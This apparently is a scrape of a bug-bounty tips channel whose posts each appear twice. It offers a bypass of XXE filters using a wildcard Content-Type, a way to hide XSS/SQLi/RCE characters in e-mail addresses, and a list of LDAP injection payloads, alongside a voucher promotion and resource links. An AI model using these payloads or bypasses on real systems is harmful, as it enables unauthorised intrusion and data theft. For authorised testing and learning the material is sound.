A simple bypass for XXE
To avoid XXE Injections, some web applications have custom filters that will block requests which contain "application/xml" Content-Type, to bypass these filters, we can set the Content-Type to wildcard "*/*"
#bugbounty #Infosec #securitytips
To avoid XXE Injections, some web applications have custom filters that will block requests which contain "application/xml" Content-Type, to bypass these filters, we can set the Content-Type to wildcard "*/*"
#bugbounty #Infosec #securitytips
👨💻5❤1
Should I add a discussion box below some Post which is discussable ?
Anonymous Poll
96%
Yes, I want to discuss
4%
No, i don't need to discuss anything
Bug List (Most Commonly Found) 🔥🌵
More Clarity : https://pbs.twimg.com/media/FhVuIKHVsAEKnpD?format=png&name=medium
#bugbounty #Infosec
More Clarity : https://pbs.twimg.com/media/FhVuIKHVsAEKnpD?format=png&name=medium
#bugbounty #Infosec
👏4🔥3🕊1
Bugbounty Tips
Use round brackets to inject XSS / SQLi / RCE payloads in a valid e-mail address.
❌ yourname${}<>'/"*-@domain.com
✅ yourname(${}<>'/"*-)@domain.com
✅ yourname@(${}<>'/"*-)domain.com
#bugbounty #infosec #cybersecurity
Use round brackets to inject XSS / SQLi / RCE payloads in a valid e-mail address.
❌ yourname${}<>'/"*-@domain.com
✅ yourname(${}<>'/"*-)@domain.com
✅ yourname@(${}<>'/"*-)domain.com
#bugbounty #infosec #cybersecurity
⚡7👍3😍1
Those who wants to purchase Tryhackme voucher.
please go fast
Because I personly request to the seller for discount, for you guys
This offer valid for today { according to IST }
please go fast
Because I personly request to the seller for discount, for you guys
This offer valid for today { according to IST }
👍3🤬2
LDAP injection payloads 🔥🔥🔥🔥
*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*)
*(|(objectclass=*))
*)(uid=*))(|(uid=*
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
#bugbounty #infosec
*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*)
*(|(objectclass=*))
*)(uid=*))(|(uid=*
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
#bugbounty #infosec
🤩8👍4🔥1
_All about bug bounty_ GitHub resource ❤️
These are my bug bounty notes that I have gathered from various sources, you can contribute to this repository too!
Link : https://github.com/daffainfo/AllAboutBugBounty
#bugbounty #bugbountytips #infosec
These are my bug bounty notes that I have gathered from various sources, you can contribute to this repository too!
Link : https://github.com/daffainfo/AllAboutBugBounty
#bugbounty #bugbountytips #infosec
GitHub
GitHub - daffainfo/AllAboutBugBounty: All about bug bounty (bypasses, payloads, and etc)
All about bug bounty (bypasses, payloads, and etc) - daffainfo/AllAboutBugBounty
👏8👍3😁3
💥Subdomain Enum Automation Script💥
Download Image : https://raw.githubusercontent.com/tarunKoyalwar/talosplus/main/static/script.png
#bugbounty #infosec #bugbountytips
Download Image : https://raw.githubusercontent.com/tarunKoyalwar/talosplus/main/static/script.png
#bugbounty #infosec #bugbountytips
👍4🔥4👏2🤩1